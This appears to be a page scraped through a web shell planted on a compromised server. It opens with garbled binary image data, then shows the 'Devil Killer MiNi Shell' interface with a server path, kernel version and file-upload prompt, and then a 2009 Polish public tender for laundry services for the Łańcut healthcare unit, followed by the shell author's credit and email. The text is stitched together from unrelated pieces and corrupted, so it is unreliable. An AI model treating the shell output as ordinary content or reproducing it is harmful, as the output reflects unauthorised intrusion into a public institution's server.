JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/32864-N-2009.html

<p class="kh_header"><b>Łańcut: KOMPLEKSOWE ŚWIADCZENIE USŁUG PRALNICZYCH DLA POTRZEB ZESPOŁU OPIEKI ZDROWOTNEJ W ŁAŃCUCIE WRAZ  Z TRANSPORTEM (SZP/380/4/09)</b><br>
<b>Numer ogłoszenia: 32864 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. Paderewskiego 5, 37-100 Łańcut, woj. podkarpackie, tel. 017 2240100, 2240231, faks 017 2252302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-lancut.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWE ŚWIADCZENIE USŁUG PRALNICZYCH DLA POTRZEB ZESPOŁU OPIEKI ZDROWOTNEJ W ŁAŃCUCIE WRAZ  Z TRANSPORTEM (SZP/380/4/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET I - KOMPLEKSOWE USŁUGI PRANIA 

Kody CPV - 98.31.00.00-9, CPV - 98.31.10.00-6, CPV - 98.31.50.00-4 , CPV - 50.83.00.00-2

Średnie miesięczne ilości bielizny do prania wynoszą około 10 000 kg 

Rodzaj i ilość określa załącznik nr 2 w SIWZ - formularz cenowy.
Zamawiający informuje, że w Załączniku nr 2.1 zawarty jest Wykaz placówek Zespołu Opieki Zdrowotnej w Łańcucie. Są to punkty odbioru brudnej bielizny medycznej do prania oraz przyjmowania czystej bielizny medycznej z prania. 
Ilość punktów odbioru 26. Wartość zamówienia poniżej (206 000 euro).

Przedmiotem zamówienia jest kompleksowe świadczenie usług pralniczych dla Zespołu Opieki Zdrowotnej w Łańcucie wraz z transportem zgodnie z wymogami sanitarno - epidemiologicznymi. 

Bielizna medyczna obejmuje: bieliznę ogólnoszpitalną, bieliznę zakaźną                     (z oddziału zakaźnego), bieliznę skażoną, odzież roboczą, odzież prywatną (odzież osób bezdomnych), ubrania pensjonariuszy (odzież z Zakładu Pielęgnacyjno-Opiekuńczego  w Łańcucie oraz Zakładu Opiekuńczo-Leczniczego w Handzlówce), pościel, fartuchy, piżamy, koce, poduszki, materace, mopy.

Pod pojęciem kompleksowych świadczeń usług pralniczych rozumie się:
pranie, dezynfekcję, suszenie, maglowanie, prasowanie, składanie w kostkę czystej bielizny medycznej, a także segregowanie i pakowanie zgodnie z asortymentem        
i oznaczeniami na materiale oddanym do pralni oraz reperacja z przyszywaniem guzików do bielizny medycznej wraz z transportem asortymentu brudnego do prania   i przywozem asortymentu czystego po praniu na koszt WYKONAWCY. 
Postępowanie z bielizną medyczną:
czysta bielizna medyczna powinna być zapakowana w zależności od przyjętego postępowania np. zapakowana w folię lub przez worek zewnętrzny bakterioszczelny wielokrotnego użytku lub w inny sposób zabezpieczona przed zanieczyszczeniami na całej drodze z pralni WYKONAWCY do ZAMAWIAJĄCEGO, jak również przy załadunku 
i transporcie z punktów odbioru.

Usługa powinna być: wykonywana zgodnie z technologią prania i barierą higieniczną przystosowaną do prania bielizny medycznej. Pralnia powinna spełniać wymogi sanitarno-higieniczne.
Do obowiązków Wykonawcy należy:
1.	Przyjmowanie i ewidencjonowanie zleconej do prania bielizny medycznej do poszczególnych punktów odbioru znajdujących się przy ul. Paderewskiego 5          
w Łańcucie oraz ZOL Handzlówka.
2.	Przeprowadzanie dezynfekcji.
3.	Transport w zakresie odbioru bielizny medycznej brudnej i dostawy czystej do punktów odbioru znajdujących się przy ul. Paderewskiego 5 w Łańcucie i Zakładu Opiekuńczo Leczniczego  w Handzlówce, 37-123 Handzlówka 262 (odległość około 13 km od Zespołu Opieki Zdrowotnej  w Łańcucie). 

TERMIN I REALIZACJA ZAMÓWIENIA: 

1.	Termin wykonania zamówienia odbywać się będzie w ciągu 12 miesięcy (sukcesywnie  w formie cząstkowych usług pralniczych) od pierwszego dnia obowiązywania umowy. 
2.	Termin realizacji usługi: 
1)	maksymalnie do 48 godzin od godziny odbioru, gdy bielizna odbierana jest        w punktach odbioru zlokalizowanych w Łańcucie, z zastrzeżeniem pkt. 3),
2)	maksymalnie do 72 godzin od godziny odbioru, gdy bielizna odbierana jest do prania  w punkcie odbioru ZOL Handzlówka, z zastrzeżeniem pkt. 3),
3)	pierwszy dzień roboczy kolejnego tygodnia w przypadku odbioru bielizny do prania w piątek.
3.	Odbiór brudnej i przyjęcie czystej bielizny odbywać się będzie w punktach odbioru:
1)	Zlokalizowanych w Łańcucie codziennie w dniach roboczych od poniedziałku do piątku  w godzinach od 7.30 do 14.30;
2)	ZOL Handzlówka  w dniach roboczych poniedziałek, środa i piątek                   w godzinach od 7.30 do 14.30.

TERMIN PŁATNOŚCI: 

1.	WYKONAWCA złoży u ZAMAWIAJĄCEGO fakturę VAT wraz z miesięcznym zestawieniem wykonanych usług w terminie do 5-go dnia następującego miesiąca.  
2.	Strony ustalają jednomiesięczny okres rozliczeniowy.
3.	Termin płatności: płatność za wykonane usługi prania będzie dokonywana przelewem w terminie do 30 dni po dostarczeniu faktury VAT do ZAMAWIAJĄCEGO wraz  z miesięcznym zestawieniem wykonanych usług.
4.	Za datę zapłaty faktury VAT rozumie się datę obciążenia rachunku ZAMAWIAJĄCEGO    w obsługującym go banku.
5.	 Strony uzgadniają, iż w przypadku nieterminowych płatności ze strony ZAMAWIAJĄCEGO, WYKONAWCY przysługuje prawo naliczania odsetek                     w wysokości ustawowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4, 50.83.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WADIUM

ZAMAWIAJĄCY żąda od WYKONAWCÓW wniesienia wadium, w formie 
określonej przepisami Ustawy - Prawo Zamówień Publicznych 
w wysokości: 10.000,00 PLN (za pakiet nr I ): 

Wadium wnosi się przed upływem terminu składania ofert tj. do dnia 26.02.2009r. do godz. 10.00).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy nie wykluczeni spełniający wymogi zawarte w art. 22 ust. 1 pkt. od 1) do 4) Ustawy - prawo zamówień publicznych, a mianowicie Wykonawcy którzy: 1. Posiadamy uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2. Posiadamy niezbędną wiedzę i doświadczenie oraz dysponujemy potencjałem technicznym                i osobami zdolnymi do wykonania zamówienia lub przedstawiamy pisemne zobowiązanie                    (w formie załącznika) innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
3. Znajdujemy się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
4. Nie podlegamy wykluczeniu z postępowania o udzielenie zamówienia z art. 24 ust. 1. pkt. od 1) do 10) i ust. 2 pkt. od 1) do 4) - Prawo zamówień publicznych. ZAMAWIAJĄCY będzie dokonywał oceny spełniania warunków udziału w postępowaniu na podstawie przedłożonych przez WYKONAWCÓW w ofercie dokumentów i oświadczeń na zasadzie: spełnia;nie spełnia (DRUK - ZP - 17)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.	W celu potwierdzenia, że WYKONAWCA posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo Zamówień Publicznych, ZAMAWIAJĄCY wymaga złożenia                 w ofercie następujących dokumentów (oświadczeń, zaświadczeń, informacji):

1.	Oświadczenia, że WYKONAWCA spełnia wszystkie wymagania zawarte w art. 22 ust. 1 pkt. od 1) do 4) oraz nie podlega wykluczeniu z postępowania z mocy art. 24 ust. 1 pkt. od 1) do 10) i ust. 2 pkt. od 1) do 4) ustawy - Prawo zamówień publicznych - Załącznik Nr 3 do oferty. 
2.	Oświadczenia WYKONAWCY, o spełnianiu warunków zgodnie z art. 44 ustawy - Prawo zamówień publicznych - Załącznik Nr 4 do oferty. 
3.	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu           o udzielenie zamówienia albo składania ofert - Załącznik Nr 5 do oferty. Dokument ten WYKONAWCA powinien dołączyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem i powinien być podpisany przez osobę;y uprawnioną;e lub upoważnioną;e do reprezentowania WYKONAWCY.

B.	W celu potwierdzenia opisanego przez ZAMAWIAJĄCEGO, warunku posiadania przez  WYKONAWCĘ niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, ZAMAWIAJĄCY żąda następujących dokumentów:

1.	Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, jeżeli okres prowadzenia działalności jest krótszy -    w tym okresie, (co najmniej 5 usług) odpowiadających swoim rodzajem i wartością (min. 350.000,00 PLN) dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie (5 dokumentów potwierdzających należyte wykonanie usług pralniczych) - Załącznik Nr 6 do oferty. 
         Dokumenty potwierdzające należyte wykonanie usług pralniczych (referencje) należy dołączyć w formie oryginałów lub kopii poświadczonych za zgodność z oryginałem. Dokumenty te (referencje), powinny być podpisane przez osobę;y uprawnioną;e lub upoważnioną;e do reprezentowania WYKONAWCY). 
Wzór formularza z wykazem usług został przygotowany przez ZAMAWIAJĄCEGO       
i dołączony do SIWZ. 
2.	Aktualną opinię lub zaświadczenie Państwowej Inspekcji Sanitarnej potwierdzającą, że pralnia WYKONAWCY spełnia wymogi pralni szpitalnej określonej w Rozporządzeniu Ministra Zdrowia z dnia 10 listopada 2006r., w sprawie wymagań, jakimi powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. Nr 213 poz. 1568 ze zm.). Dokument winien być wystawiony nie wcześniej niż 3 miesiące przed terminem złożenia oferty - Załącznik Nr 7 do oferty. Dokument ten WYKONAWCA powinien dołączyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem i powinien być podpisany przez osobę;y uprawnioną;e lub upoważnioną;e do reprezentowania WYKONAWCY.
3.	Aktualna opinię lub zaświadczenie Państwowej Inspekcji Sanitarnej potwierdzającą, że  WYKONAWCA dysponuje zamkniętymi środkami transportu przystosowanymi do przewozu bielizny szpitalnej, (WYKONAWCA powinien posiadać co najmniej 2 pojazdy przystosowane do transportu i przewozu bielizny medycznej) - Załącznik Nr 8 do oferty. Dokument ten WYKONAWCA powinien dołączyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem i powinien być podpisany przez osobę;y uprawnioną;e lub upoważnioną;e do reprezentowania WYKONAWCY.
4.	Wykaz wyposażenia pralni w urządzenia pralnicze, prasowalnice, maglownice z podaniem ich wydajności na dobę, które zabezpieczą prawidłowe i terminowe wykonanie umowy - Załącznik Nr 9 do oferty. Wzór formularza został przygotowany przez ZAMAWIAJĄCEGO             i dołączony do SIWZ.

C.	W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez ZAMAWIAJĄCEGO, WYKONAWCA składa następujące dokumenty:

1.	Wykaz używanych przez WYKONAWCĘ do prania bielizny medycznej środków piorących                   i dezynfekcyjnych, aby spełniały wymagania określone w Ustawie z dnia 20 kwietnia 2004r.  o wyrobach medycznych tj. posiadały rejestrację jako wyrób medyczny oraz wpis do Rejestru w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych                               i Produktów Biobójczych (jeśli dotyczy) - Załącznik Nr 10 do oferty. Wzór formularza został przygotowany przez ZAMAWIAJĄCEGO i dołączony do SIWZ. 
2.	Opis technologii (procedur) prania, dla poszczególnych rodzajów bielizny medycznej (przyjmowanie, transport, pranie i dezynfekcja): 1) bielizny noworodkowej i dziecięcej,             2) bielizny skażonej z bloku operacyjnego i oddziału zakaźnego, 3) bielizny skażonej                    z pozostałych komórek org. Szpitala, 4) odzieży roboczej, 5) bielizny ogólnoszpitalnej (brudnej) tj. nie zanieczyszczone krwią, wydzieliną, wydaliną pacjenta, 6) kocy, poduszek, materacy, mopów - Załącznik Nr 11 do oferty. Wzór formularza został przygotowany przez Zamawiającego i dołączony do SIWZ.

WYKAZ INNYCH WYMAGANYCH DOKUMENTÓW:
1.	Wypełniony FORMULARZ OFERTOWY - Załącznik Nr 1 do oferty. 
2.	Wypełniony FORMULARZ CENOWY - PAKIET Nr I - Załącznik Nr: 2 do oferty.
3.	WYKAZ PLACÓWEK ZESPOŁU OPIEKI ZDROWOTNEJ W ŁAŃCUCIE -                 punkty odbioru brudnej bielizny do prania i punkty czystej odbioru bielizny z prania -  Załącznik Nr: 2.1 do oferty.
4.	Zestawienie placówek, punktów i osób odpowiedzialnych (wzór do akceptacji)- Załącznik Nr: 2.2 do oferty.
5.	Miesięczne zestawienie wykonania usług (wzór do akceptacji)- Załącznik Nr 2.3 do oferty.
6.	Zaakceptowany wzór Umowy Usługi - Załącznik Nr 12 do oferty.

Wymagane dokumenty załączone w formie kserokopii muszą być potwierdzone za zgodność z oryginałem. Poświadczenia winna/y dokonać osoba;y uprawniona;e do reprezentowania WYKONAWCY (tj. osoba;osoby wymieniona;e w odpisie z właściwego rejestru lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej) lub osoba;y upoważniona;e do reprezentowania WYKONAWCY na podstawie odrębnego pełnomocnictwa, które powinno być dołączone do oferty w formie oryginału..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90.00</li>
<li>2 - Okres Niezmienności Cen - 10.00</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz-lancut.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej w Łańcucie, ul. Paderewskiego 5, 37-100 Łańcut - dział zamówień publicznych pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2009 godzina 10:00, miejsce: Sekretariacie Zespołu Opieki Zdrowotnej w Łańcucie,ul. Paderewskiego 5, 
37-100 Łańcut (pokój nr 13)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com